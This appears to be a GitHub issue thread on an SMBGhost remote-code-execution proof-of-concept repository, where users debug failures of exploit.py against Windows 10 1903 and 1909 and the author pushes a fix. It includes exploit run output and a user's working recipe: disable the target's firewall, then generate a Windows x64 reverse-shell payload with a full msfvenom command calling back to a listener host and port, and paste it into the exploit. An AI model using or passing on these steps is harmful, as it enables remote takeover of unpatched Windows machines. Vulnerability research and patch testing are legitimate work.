chompie1337 / SMBGhost_RCE_PoC


Exploit doesn't work #1

Closed 0xFF1E071F closed 4 years ago

0xFF1E071F commented 4 years ago

I am using py3.8, host machine Linux, target machine Win10 b1903.

they are on the same virtual network

I got this error when I try to run exploit.py:

[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7a180000000
[+] ntoskrnl entry at fffff8054d392010
[+] found PML4 self-ref entry 1e5
[+] found HalpInterruptController at fffff7a1800015b8
Traceback (most recent call last):
  File "exploit.py", line 475, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 438, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 351, in search_hal_heap
    buff = read_physmem_primitive(ip, port, index + i + 0x38)
  File "exploit.py", line 205, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 220, in try_read_physmem_primitive
    buff = sock.recv(1000)
socket.timeout: timed out

edit: fix right error

895515845 commented 4 years ago

I have this problem, so what should I do?

0xFF1E071F commented 4 years ago

> I have this problem, so what should I do?

Unfortunately I couldn't find a solution yet :/

chompie1337 commented 4 years ago

nvm, it's a bug. I changed the HAL heap search and forgot to update that case. Will post a fix shortly.

chompie1337 commented 4 years ago

Fix for this error has been pushed.

0xFF1E071F commented 4 years ago

Thank you, I have another error now:

python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes

0xFF1E071F commented 4 years ago

OK ppl, if you are reading this don't forget to:

  1. close the Win 10 b1903/1909 firewall
  2. run msfvenom as: msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python and change the USER_PAYLOAD with this shellcode.

This code now works on b1903.

And I cannot make it exploit 1909 machines.

0xFF1E071F commented 4 years ago

Ok, when I use the exploit on b1909 machines, the python code works normally (I mean no error output). But the b1909 machine crashes and reboots.

0xFF1E071F commented 4 years ago

Now works on 1909, thanks.